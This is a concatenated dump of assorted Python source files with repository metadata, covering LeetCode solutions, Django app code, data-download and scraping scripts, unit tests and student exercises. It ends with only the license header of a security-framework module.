# all copies or substantial portions of the Software.
|
[
"[email protected]"
] | |
15d2b575651bdea86b38c0e958fcaf83eaae4442
|
760fbf0e4675212a89dbba28ef771bf7ff7a0d91
|
/Leetcode2019/145. 二叉树的后序遍历.py
|
06d8fc7c4c1096758d26866d0f867745ac54876d
|
[] |
no_license
|
chixujohnny/Leetcode
|
1a420e318005140a2be036ab7c3fcd054b4ae011
|
3faa41556f13f45a08b49d4dcd371ed590f9cb14
|
refs/heads/master
| 2021-06-19T14:44:28.464335 | 2021-01-11T08:16:26 | 2021-01-11T08:16:26 | 155,142,704 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 563 |
py
|
# coding: utf-8
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def postorderTraversal(self, root):
"""
:type root: TreeNode
:rtype: List[int]
"""
res = []
def helper(root):
if root == None:
return
helper(root.left)
helper(root.right)
res.append(root.val)
helper(root)
return res
|
[
"[email protected]"
] | |
7dcbcaa847c475cb4d1f139f4cd8eb41abab09cb
|
2f989d067213e7a1e19904d482a8f9c15590804c
|
/lib/python3.4/site-packages/django/contrib/contenttypes/apps.py
|
e5708adc99840e3b4a4bc3212d26d134a8462203
|
[
"MIT"
] |
permissive
|
levabd/smart4-portal
|
beb1cf8847134fdf169ab01c38eed7e874c66473
|
2c18ba593ce7e9a1e17c3559e6343a14a13ab88c
|
refs/heads/master
| 2023-02-18T05:49:40.612697 | 2022-08-02T09:35:34 | 2022-08-02T09:35:34 | 116,001,098 | 0 | 1 |
MIT
| 2023-02-15T21:34:01 | 2018-01-02T10:00:07 |
Roff
|
UTF-8
|
Python
| false | false | 693 |
py
|
from django.apps import AppConfig
from django.contrib.contenttypes.checks import check_generic_foreign_keys
from django.core import checks
from django.db.models.signals import post_migrate, pre_migrate
from django.utils.translation import ugettext_lazy as _
from .management import (
inject_rename_contenttypes_operations, update_contenttypes,
)
class ContentTypesConfig(AppConfig):
name = 'django.contrib.contenttypes'
verbose_name = _("Content Types")
def ready(self):
pre_migrate.connect(inject_rename_contenttypes_operations, sender=self)
post_migrate.connect(update_contenttypes)
checks.register(check_generic_foreign_keys, checks.Tags.models)
|
[
"[email protected]"
] | |
59e22f98d350ea5b45fcfb9fc47ea110043bdec0
|
9556f7e1d81a305d71a66b9768eba199e396d733
|
/Thread/venv/bin/pip
|
698fcef12df25482e9901a7aecb433703142f6b8
|
[] |
no_license
|
gitgaoqian/Python
|
301a2823b50ec754a2c1a3f47c39ae8b0b8e6890
|
164f5271044b235d256a9bbe0a34caacf1e81fc8
|
refs/heads/master
| 2023-01-08T21:23:59.640828 | 2020-11-01T13:06:21 | 2020-11-01T13:06:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 394 |
#!/home/ros/pycharm/MyFiles/thread/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==9.0.1','console_scripts','pip'
__requires__ = 'pip==9.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==9.0.1', 'console_scripts', 'pip')()
)
|
[
"[email protected]"
] | ||
01b2be76c7a39b05d6db36b19dba8018456848d3
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_125/ch22_2020_03_02_20_28_19_768242.py
|
6c3da9295a0c587ec5b4d1b65f83ce4882ba77e4
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 143 |
py
|
dias = int(input('quantos cigarros voce fuma por dia ? '))
anos = int(input('há quantos anos voce fuma?' ))
print ((anos*365*24*60)*dias*144)
|
[
"[email protected]"
] | |
dba2f8e1a2489ee8595497efbce2fbe54822fbb2
|
c8a04384030c3af88a8e16de4cedc4ef8aebfae5
|
/stubs/pandas/tests/indexes/test_setops.pyi
|
3493fb22582660788efeadee60d6a7bc60cb4307
|
[
"MIT"
] |
permissive
|
Accern/accern-xyme
|
f61fce4b426262b4f67c722e563bb4297cfc4235
|
6ed6c52671d02745efabe7e6b8bdf0ad21f8762c
|
refs/heads/master
| 2023-08-17T04:29:00.904122 | 2023-05-23T09:18:09 | 2023-05-23T09:18:09 | 226,960,272 | 3 | 2 |
MIT
| 2023-07-19T02:13:18 | 2019-12-09T20:21:59 |
Python
|
UTF-8
|
Python
| false | false | 660 |
pyi
|
# Stubs for pandas.tests.indexes.test_setops (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
# pylint: disable=unused-argument,redefined-outer-name,no-self-use,invalid-name
# pylint: disable=relative-beyond-top-level
from typing import Any
COMPATIBLE_INCONSISTENT_PAIRS: Any
def index_pair(request: Any) -> Any:
...
def test_union_same_types(indices: Any) -> None:
...
def test_union_different_types(index_pair: Any) -> None:
...
def test_compatible_inconsistent_pairs(idx_fact1: Any, idx_fact2: Any) -> None:
...
def test_union_dtypes(left: Any, right: Any, expected: Any) -> None:
...
|
[
"[email protected]"
] | |
cc6016e65e7b3e125b87d996e95b98ff5f2a1e52
|
c17ca7a7824056f7ad58d0f71abc25670b20c1fc
|
/spirit/urls/admin/__init__.py
|
1bc65e9f0daf9e9e944ad49a9811b0f1d6942c43
|
[
"Apache-2.0"
] |
permissive
|
Si-elegans/Web-based_GUI_Tools
|
cd35b72e80aa400105593c5c819355437e204a81
|
58a9b7a76bc46467554192a38ff5329a94e2b627
|
refs/heads/master
| 2023-01-11T09:11:21.896172 | 2017-07-18T11:10:31 | 2017-07-18T11:10:31 | 97,445,306 | 3 | 1 |
Apache-2.0
| 2022-12-26T20:14:59 | 2017-07-17T07:03:13 |
JavaScript
|
UTF-8
|
Python
| false | false | 536 |
py
|
#-*- coding: utf-8 -*-
from django.conf.urls import patterns, include, url
urlpatterns = patterns('',
url(r'^$', 'spirit.views.admin.index.dashboard', name='admin'),
url(r'^index/', include('spirit.urls.admin.index')),
url(r'^category/', include('spirit.urls.admin.category')),
url(r'^comment/flag/', include('spirit.urls.admin.comment_flag')),
url(r'^config/', include('spirit.urls.admin.config')),
url(r'^topic/', include('spirit.urls.admin.topic')),
url(r'^user/', include('spirit.urls.admin.user')),
)
|
[
"[email protected]"
] | |
1d8542da9fe05431ce0785b0c97e19b60e7aec39
|
e15ec378360536d5215bf0f0a8fa9ab8a41ff6cc
|
/ch06/p6-3-1.py
|
344f657d4d90d4170ca1d407f4091c37e6166324
|
[] |
no_license
|
michlin0825/book-mP21926
|
2ece5685ded2c913f51c830fd6f3280b8394646f
|
5c4ebd828e593efd5fc7ba40bbcf606babd52640
|
refs/heads/main
| 2023-01-02T05:48:49.832014 | 2020-10-12T02:22:21 | 2020-10-12T02:22:21 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 433 |
py
|
from selenium import webdriver
from bs4 import BeautifulSoup
import time
url = 'https://www.cwb.gov.tw/V8/C/W/OBS_County.html?ID=menu'
web = webdriver.Chrome('chromedriver.exe')
web.implicitly_wait(60)
web.get(url)
html = web.page_source
web.quit()
soup = BeautifulSoup(html, 'html.parser')
target = soup.select('#County option')
counties = list()
for item in target:
counties.append((item.text,item['value']))
print(counties)
|
[
"[email protected]"
] | |
0c826b71c27b17e526b9807cbca19ce674539404
|
b57d337ddbe946c113b2228a0c167db787fd69a1
|
/scr/py00468notices.py
|
c8f23c8ddfd5182e7ed018cb580fa0c212a0c0c1
|
[] |
no_license
|
aademchenko/ToEE
|
ebf6432a75538ae95803b61c6624e65b5cdc53a1
|
dcfd5d2de48b9d9031021d9e04819b309d71c59e
|
refs/heads/master
| 2020-04-06T13:56:27.443772 | 2018-11-14T09:35:57 | 2018-11-14T09:35:57 | 157,520,715 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,612 |
py
|
from toee import *
from utilities import *
import _include
from co8Util.TimedEvent import *
from combat_standard_routines import *
from py00439script_daemon import get_f, set_f, get_v, set_v, tpsts, record_time_stamp
def san_use( attachee, triggerer ):
if (attachee.name == 11063):
game.quests[110].state = qs_mentioned
game.new_sid = 0
elif (attachee.name == 11064):
game.quests[90].state = qs_mentioned
game.new_sid = 0
elif (attachee.name == 11065):
game.quests[111].state = qs_mentioned
game.new_sid = 0
elif (attachee.name == 11066):
game.quests[112].state = qs_mentioned
game.new_sid = 0
elif (attachee.name == 11067):
game.quests[108].state = qs_mentioned
game.global_vars[939] = 1
game.new_sid = 0
elif (attachee.name == 11068):
if (game.quests[97].state != qs_botched):
game.quests[97].state = qs_botched
if (game.party[0].reputation_has(53) == 0):
game.party[0].reputation_add( 53 )
game.global_vars[510] = 2
game.global_flags[504] = 1
game.new_sid = 0
elif (attachee.name == 11069):
triggerer.money_adj(-10000)
attachee.destroy()
elif (attachee.name == 11070):
game.quests[106].state = qs_mentioned
game.new_sid = 0
elif (attachee.name == 11071):
game.quests[95].state = qs_completed
game.new_sid = 0
elif (attachee.name == 11072):
game.quests[105].state = qs_mentioned
set_bethany()
game.new_sid = 0
elif (attachee.name == 11073):
game.quests[105].state = qs_mentioned
set_bethany()
game.new_sid = 0
return RUN_DEFAULT
def set_bethany():
game.encounter_queue.append(3447)
set_f('s_bethany_scheduled')
return RUN_DEFAULT
|
[
"[email protected]"
] | |
4981a7e806be3173914d83131e900e93b70cefac
|
c89f5856fe74cff49a9d96dde9ed0117109e3845
|
/A-bit-of-py/exceptions_raise.py
|
18c685701366068a4acd2f51c1194d541cbb8930
|
[] |
no_license
|
sinoclover/python
|
b2b3f435d15840ec16a34c62d50308bdfb9d6c3e
|
02f5347bc8219f1df52486077adf0017fe6d5211
|
refs/heads/master
| 2020-08-27T22:14:20.672846 | 2019-12-01T13:27:42 | 2019-12-01T13:27:42 | 158,791,898 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 647 |
py
|
# encoding=UTF-8
class ShortInputException(Exception):
'''一个由用户定义的异常类'''
def __init__(self, length, atleast):
Exception.__init__(self)
self.length = length
self.atleast = atleast
try:
text = input('Enter something --> ')
if len(text) < 3:
raise ShortInputException(len(text), 3)
# 其他工作能在此处继续正常运行
except EOFError:
print('Why did you do an EOF on me?')
except ShortInputException as ex:
print(('ShortInputException: The input was {0} long, expected at least {1}').format(ex.length, ex.atleast))
else:
print('No exception was raised')
|
[
"[email protected]"
] | |
4fc31a6ff5a7263512d12b5b20ad20f35c45dff3
|
2c510687bdc03fbb8383130e68cc796bfef1088c
|
/3_basic_ds/exercises.py
|
328dff7335a429dab792cb7b5a6f8adc62aeda37
|
[] |
no_license
|
jimjshields/pswads
|
59758a0972fe71ca6f77305ff8ab86673d9b5d46
|
9568622805e24416f4a227cbecc1ef4927fa7ba3
|
refs/heads/master
| 2016-09-06T12:37:53.254464 | 2015-02-17T02:13:00 | 2015-02-17T02:13:00 | 30,149,564 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,772 |
py
|
# Chapter 3 Programming Exercises
# Skip all pre-/post-/infix questions; not worth the time.
# Also skip any 'experiment' questions. Maybe come back to them.
# 5. Implement the Queue ADT, using a list such that the rear of the queue is at the end of the list.
class Queue(object):
"""Represents a queue ADT. The rear of the queue is the end of the list used.
Necessary methods: enqueue, dequeue, size, is_empty."""
def __init__(self):
"""Initializes an empty queue using a list."""
self.items = []
def enqueue(self, item):
"""Adds an item to the rear of the queue."""
self.items.append(item)
def dequeue(self):
"""Removes and returns an item from the front of the queue."""
return self.items.pop(0)
def size(self):
"""Returns the number of items in the queue."""
return len(self.items)
def is_empty(self):
"""Checks whether the queue has no items."""
return self.items == []
# q = Queue()
# q.enqueue(1)
# q.enqueue(2)
# q.enqueue(3)
# q.enqueue(4)
# q.enqueue(5)
# print q.items
# print q.dequeue()
# print q.dequeue()
# print q.dequeue()
# print q.dequeue()
# print q.dequeue()
# print q.is_empty()
# 7. It is possible to implement a queue such that both enqueue and dequeue have O(1) performance on average. In this case it means that most of the time enqueue and dequeue will be O(1) except in one particular circumstance where dequeue will be O(n).
class Queue_2(object):
"""Represents a queue ADT with O(1) enqueue and dequeue time on average."""
def __init__(self):
"""Initializes an empty queue with a list.
Also initializes the dequeue variable for O(1) access time."""
self.items = []
self.to_be_dequeued = ''
def enqueue(self, item):
self.items.append(item)
self.to_be_dequeued = self.items[0]
|
[
"[email protected]"
] | |
e103e52c8d1db2ceda089eb62bb3d134391fee80
|
102a33464fd3a16ceedd134e9c64fea554ca5273
|
/apps/config/models.py
|
39260020ed66b83fc8e77d4bf08ecae9ee053a6b
|
[] |
no_license
|
pythonguru101/django-ecommerce
|
b688bbe2b1a53c906aa80f86f764cf9787e6c2fe
|
f94de9c21223716db5ffcb86ba87219da88d2ff4
|
refs/heads/master
| 2020-07-24T14:57:02.047702 | 2020-06-10T06:06:23 | 2020-06-10T06:06:23 | 207,961,132 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,658 |
py
|
# encoding: utf-8
from django.db import models
from django.utils.translation import ugettext as _
class ConfigAbstractManager(models.Manager):
def get_config(self):
try:
return self.get(pk=1)
except self.model.DoesNotExist:
return {}
class ConfigAbstract(models.Model):
text_main_bot = models.TextField(_(u'текст на главной внизу'), blank=True)
phone = models.CharField(_(u'номер телефона'), max_length=32, blank=True)
email = models.EmailField(_(u'email'), blank=True)
title_page = models.CharField(_(u'заголовок страницы'), max_length=140,
blank=True)
meta_keywords = models.CharField(_(u'meta keywords'), max_length=200,
blank=True)
meta_description = models.TextField(_(u'meta description'), blank=True)
yandex_verification = models.CharField(_(u'Yandex Verification'),
max_length=100, blank=True)
yml_name = models.CharField(_(u'YML: name'), max_length=250)
yml_email = models.EmailField(_(u'YML: email'))
yml_company = models.CharField(_(u'YML: company'), max_length=250)
objects = ConfigAbstractManager()
class Meta:
abstract = True
verbose_name = _(u'настройки')
verbose_name_plural = _(u'настройки')
def __unicode__(self):
return u'настройки'
def save(self, *args, **kwargs):
self.pk = 1
return super(ConfigAbstract, self).save(*args, **kwargs)
class ConfigManagerManager(models.Manager):
def get_emails(self):
return [m['email'] for m in self.values('email')]
class Config(ConfigAbstract):
title_blog = models.CharField(_(u'заголовок блога'), max_length=140,
blank=True)
facebook_app_id = models.CharField(_(u'FaceBook App ID'), max_length=100,
blank=True)
afrek_id = models.CharField(_(u'Партнёрка afrek.ru'), max_length=100,
blank=True)
class ConfigManager(models.Model):
config = models.ForeignKey(Config,
verbose_name=_(u'менеджер'), on_delete=models.CASCADE)
name = models.CharField(_(u'имя'), max_length=100)
email = models.EmailField(_(u'email'))
objects = ConfigManagerManager()
class Meta:
verbose_name = _(u'менеджер')
verbose_name_plural = _(u'менеджеры')
def __unicode__(self):
return "%s <%s>" % (self.name, self.email)
|
[
"[email protected]"
] | |
fa27bce37bd4a31c0734171d2f4b56a9949bad56
|
d52413173437ba73ecdf822ca895e659f00a8ce7
|
/kiwibackend/application/module/artifact/migrations/0003_auto_20151209_1606.py
|
66ae6b692b0125f17dbbc5170a7fce62dbc9ac44
|
[] |
no_license
|
whiteprism/mywork
|
2329b3459c967c079d6185c5acabd6df80cab8ea
|
a8e568e89744ca7acbc59e4744aff2a0756d7252
|
refs/heads/master
| 2021-01-21T11:15:49.090408 | 2017-03-31T03:28:13 | 2017-03-31T03:28:13 | 83,540,646 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 946 |
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('artifact', '0002_auto_20150914_0908'),
]
operations = [
migrations.AddField(
model_name='artifact',
name='heroTypeList_int',
field=models.CharField(default=b'', max_length=200, verbose_name='\u88c5\u5907\u7684\u82f1\u96c4\u7684\u7c7b\u578b'),
),
migrations.AddField(
model_name='artifact',
name='searchDifficuty_int',
field=models.CharField(default=b'', max_length=200, verbose_name='\u6389\u843d\u5173\u5361\u96be\u5ea6'),
),
migrations.AddField(
model_name='artifact',
name='searchInstances_int',
field=models.CharField(default=b'', max_length=200, verbose_name='\u6389\u843d\u5173\u5361'),
),
]
|
[
"[email protected]"
] | |
cb1b755acd76f9db92cf7cb4a054a194126f2c56
|
2cf87feeebfe128d6c60067e82e5b28b3a84ae45
|
/aracle/data/make3dslices.py
|
a5b16c308b96da0c083019c4adf28e64496bd654
|
[
"MIT"
] |
permissive
|
jiwoncpark/aracle
|
b536fbea39480b7af96daff1a9c51d2a7f131866
|
20aabe27ce65b738b77192242dc89eda612f945e
|
refs/heads/master
| 2020-06-03T15:21:35.386628 | 2019-11-12T17:49:34 | 2019-11-12T17:49:34 | 191,626,657 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,320 |
py
|
import drms #pip install drms, astropy, sunpy , skvideo
import numpy as np
import astropy.units as u
import shutil
import os
import datetime
import matplotlib.pyplot as plt
import skvideo.io
from astropy.io import fits
from matplotlib.pyplot import imshow
from PIL import Image
from sunpy.map import Map
from datetime import date, time, datetime, timedelta
workdir = 'C:/Users/alexf/Desktop/HMI_Data/'
fits_dir = workdir + 'fits/'
if not os.path.exists(workdir):
os.mkdir(workdir)
print("Directory " + workdir + "does not exist. Creating...")
start = datetime(2010,5,1,1,0,0)#date time object format is year, month, day, hour, minute, second
end = datetime(2018,5,1,0,0,0)
time_interval = timedelta(minutes = 60) #timedelta will accept weeks,days,hours,minutes and seconds as input
chunk_size = 480 #chunk size is the number of hmi files downloaded in each export call. must be at least 1
export_protocol = 'fits'#using as-is instead of fits will result in important metadata not being downloaded
email = '[email protected]'#use a group email
series = 'hmi.M_720s'
if (end < start):
print("The end date is before the start date. Please select an end date after the start date")
#sys.exit()
if not os.path.exists(fits_dir):
os.mkdir(fits_dir)
print("Directory " + fits_dir + "does not exist. Creating...")
c = drms.Client(email=email, verbose = True)
total = (end-start) // time_interval + 1
print('Downloading ' + str(total) + ' files')
missing_files = []
def download(start,end,chunk_size,time_interval):
current_time = start
while(current_time<end):
if (end-current_time > (time_interval * chunk_size)):
time_chunk = (time_interval * chunk_size)
else:
time_chunk = end-current_time
end_time = current_time + time_chunk
current_timestring = current_time.strftime('%Y' + '.' + '%m' + '.'+'%d'+'_'+'%X') + '_UT'
end_timestring = end_time.strftime('%Y' + '.' + '%m' + '.'+'%d'+'_'+'%X') + '_UT'
query = series + '[' + current_timestring + '-' + end_timestring + '@' + str(time_interval.total_seconds()) + 's]'
print('Query string: ' + query)
try:
r = c.export(query, protocol = export_protocol)
r.download(fits_dir)
exists = os.path.isfile(fits_dir + '.1')
if exists:#if a fits file no longer exists, it will be downloaded as an empty .1 file. this deletes .1 files
os.remove(fits_dir + '.1')
raise ValueError('Fits file no longer exists. Deleting downloaded file...')
except:#if files are missing from the server, the export call fails. this keeps track of missing files
if (chunk_size == 1):
missing_files.append(current_timestring)
else:
download(current_time,end_time,chunk_size//2,time_interval)
current_time = end_time
download(start,end,chunk_size,time_interval)
print(missing_files)
#delete all duplicate files
test = os.listdir(fits_dir)
for item in test:
if item.endswith(".1"):
os.remove(os.path.join(fits_dir, item))
Xdata_dir = workdir + 'Xdata/'
if not os.path.exists(Xdata_dir):
os.mkdir(Xdata_dir)
print("Directory " + Xdata_dir + "does not exist. Creating...")
fits_filenames = os.listdir(fits_dir)
resizing = [256]
for resize in resizing:
resize_dir = Xdata_dir + str(resize)
if os.path.exists(resize_dir):#delete any resizing directories matching the new resizes
shutil.rmtree(resize_dir)
os.makedirs(resize_dir)#creates new resize directories
for filename in fits_filenames: #iterates over fits files and converts to a numpy array
hmi_map = Map(fits_dir + filename)
rotateddata90 = hmi_map.rotate(angle=90*u.deg, order = 0)
rotateddata180 = rotateddata90.rotate(angle=90*u.deg, order = 0)
data = rotateddata180.data
data[np.where(np.isnan(data))] = 0.0 # replacing nans with 0s
print('saving '+filename +' in sizes'+ str(resizing))
for resize in resizing:#resizes and saves numpy array data into given resizes
resized_image = np.array(Image.fromarray(data).resize((resize,resize),Image.LANCZOS))
np.save(Xdata_dir + str(resize) + '/' + filename[:26] + '_'+ str(resize), resized_image)#saves series,time,and resize
|
[
"[email protected]"
] | |
97176f4b2cf2a2706ba0989eee781b449a4cf6b0
|
14cdc1353affd01ec9f96c31cd51549d82364b2c
|
/test/IECore/OptionsTest.py
|
f257f594de42cc75781eb2db60bfa267e5f96a44
|
[] |
no_license
|
dsparrow27/cortex
|
f787cdcc271388986cd24ee27b48999ae71ef194
|
5e985efa860aec22a0c8ec6cebf9e682f65eca73
|
refs/heads/master
| 2021-08-19T06:30:36.881268 | 2017-11-23T08:26:13 | 2017-11-23T08:26:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,627 |
py
|
##########################################################################
#
# Copyright (c) 2012, John Haddon. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# * Neither the name of Image Engine Design nor the names of any
# other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
class OptionsTest( unittest.TestCase ) :
def testCopy( self ) :
o = IECore.Options()
o.options["test"] = IECore.FloatData( 10 )
oo = o.copy()
self.assertEqual( o, oo )
def testConstructFromDict( self ) :
o = IECore.Options( {
"a" : IECore.StringData( "a" ),
"b" : IECore.IntData( 10 ),
} )
self.assertEqual( len( o.options ), 2 )
self.assertEqual( o.options["a"], IECore.StringData( "a" ) )
self.assertEqual( o.options["b"], IECore.IntData( 10 ) )
def testHash( self ) :
o1 = IECore.Options()
o2 = IECore.Options()
self.assertEqual( o1.hash(), o2.hash() )
o1.options["a"] = IECore.StringData( "a" )
self.assertNotEqual( o1.hash(), o2.hash() )
o2.options["a"] = IECore.StringData( "a" )
self.assertEqual( o1.hash(), o2.hash() )
if __name__ == "__main__":
unittest.main()
|
[
"[email protected]"
] | |
49716fffe1d3d747365e83abe99f48f2a62222a2
|
be5c86e8fe3f5836b7d2097dd5272c72b5b28f15
|
/binary-search/Python/0374-guess-number-higher-or-lower.py
|
bca7b49cffd223314f15f7da64b8be501150cf07
|
[
"Apache-2.0"
] |
permissive
|
lemonnader/LeetCode-Solution-Well-Formed
|
d24674898ceb5441c036016dc30afc58e4a1247a
|
baabdb1990fd49ab82a712e121f49c4f68b29459
|
refs/heads/master
| 2021-04-23T18:49:40.337569 | 2020-03-24T04:50:27 | 2020-03-24T04:50:27 | 249,972,064 | 1 | 0 |
Apache-2.0
| 2020-03-25T12:26:25 | 2020-03-25T12:26:24 | null |
UTF-8
|
Python
| false | false | 523 |
py
|
# The guess API is already defined for you.
# @param num, your guess
# @return -1 if my number is lower, 1 if my number is higher, otherwise return 0
def guess(num):
pass
class Solution(object):
def guessNumber(self, n):
left = 1
right = n
while left < right:
mid = (left + right) >> 1
if guess(mid) == 1:
left = mid + 1
else:
right = mid
# 最后剩下的数一定是所求,无需后处理
return left
|
[
"[email protected]"
] | |
7fe354c98d8d01ba22505c5e5c51b733782f34d6
|
a3cc7286d4a319cb76f3a44a593c4a18e5ddc104
|
/lib/googlecloudsdk/api_lib/ml/vision/util.py
|
d48320c61c682ef73501c2c44fe8ff497a756db5
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
jordanistan/Google-Cloud-SDK
|
f2c6bb7abc2f33b9dfaec5de792aa1be91154099
|
42b9d7914c36a30d1e4b84ae2925df7edeca9962
|
refs/heads/master
| 2023-09-01T01:24:53.495537 | 2023-08-22T01:12:23 | 2023-08-22T01:12:23 | 127,072,491 | 0 | 1 |
NOASSERTION
| 2023-08-22T01:12:24 | 2018-03-28T02:31:19 |
Python
|
UTF-8
|
Python
| false | false | 2,070 |
py
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for gcloud ml vision commands."""
import os
import re
from googlecloudsdk.api_lib.util import apis
from googlecloudsdk.core import exceptions
VISION_API = 'vision'
VISION_API_VERSION = 'v1'
IMAGE_URI_FORMAT = r'^(https{,1}?|gs)://'
class Error(exceptions.Error):
"""Error for gcloud ml vision commands."""
class ImagePathError(Error):
"""Error if an image path is improperly formatted."""
def GetImageFromPath(path):
"""Builds an Image message from a path.
Args:
path: the path arg given to the command.
Raises:
ImagePathError: if the image path does not exist and does not seem to be
a remote URI.
Returns:
vision_v1_messages.Image: an image message containing information for the
API on the image to analyze.
"""
messages = apis.GetMessagesModule(VISION_API, VISION_API_VERSION)
image = messages.Image()
if os.path.isfile(path):
with open(path, 'rb') as content_file:
image.content = content_file.read()
elif re.match(IMAGE_URI_FORMAT, path):
image.source = messages.ImageSource(imageUri=path)
else:
raise ImagePathError(
'The image path does not exist locally or is not properly formatted. '
'A URI for a remote image must be a Google Cloud Storage image URI, '
'which must be in the form `gs://bucket_name/object_name`, or a '
'publicly accessible image HTTP/HTTPS URL. Please double-check your '
'input and try again.')
return image
|
[
"[email protected]"
] | |
14dfa0a6647e1c79cd33c076529270c16b054056
|
09933dafbbc12fe20c405362850ffbf315b01a58
|
/src-tag-ent/gen_data.py
|
fbddab6277c97047553db17485a2206acc0a6875
|
[] |
no_license
|
johndpope/advrelation
|
1ce1fd4ffc0b7abbea2762c3a8941b469c4f7cf5
|
bc77dcfa8669d612aded6a053fff6766798bed14
|
refs/heads/master
| 2020-03-22T22:55:48.664711 | 2018-03-03T04:43:11 | 2018-03-03T04:43:11 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,447 |
py
|
import tensorflow as tf
import config as config_lib
from inputs import dataset, semeval_v2
tf.logging.set_verbosity(tf.logging.INFO)
config = config_lib.get_config()
semeval_text = semeval_v2.SemEvalCleanedTextData(
config.semeval_dir, config.semeval_train_file, config.semeval_test_file)
# length statistics
semeval_text.length_statistics()
# gen vocab
vocab = dataset.Vocab(config.out_dir, config.vocab_file)
# vocab.generate_vocab(semeval_text.tokens())
# # trim embedding
# embed = dataset.Embed(config.out_dir, config.trimmed_embed300_file, config.vocab_file)
# google_embed = dataset.Embed(config.pretrain_embed_dir,
# config.google_embed300_file, config.google_words_file)
# embed.trim_pretrain_embedding(google_embed)
# build SemEval record data
semeval_text.set_vocab(vocab)
tag_encoder = dataset.Label(config.semeval_dir, config.semeval_tags_file)
semeval_text.set_tags_encoder(tag_encoder)
semeval_record = semeval_v2.SemEvalCleanedRecordData(semeval_text,
config.out_dir, config.semeval_train_record, config.semeval_test_record)
semeval_record.generate_data()
# INFO:tensorflow:(percent, quantile) [(50, 18.0), (70, 22.0), (80, 25.0),
# (90, 29.0), (95, 34.0), (98, 40.0), (100, 97.0)]
# INFO:tensorflow:generate vocab to data/generated/vocab.txt
# INFO:tensorflow:trim embedding to data/generated/embed300.trim.npy
# INFO:tensorflow:generate TFRecord data
|
[
"[email protected]"
] | |
c4fd4774aaf0e10c3720251b62ae4f7fd5eca3ae
|
437428a48278b4e9bc04e1b8acbb33199f409376
|
/modules/exploit/unix/cctv/goahead_password_disclosure.py
|
ae2a949fa5f2033187282244644b19db5808d163
|
[
"MIT"
] |
permissive
|
happylaodu/HatSploit
|
06d18ba2590456241ba61273d9f3d662a8bb26ec
|
9d53f3db85ce38483c6e7d16570ac233c5dd93cf
|
refs/heads/main
| 2023-04-30T20:18:37.090185 | 2021-06-02T20:23:08 | 2021-06-02T20:23:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,399 |
py
|
#!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
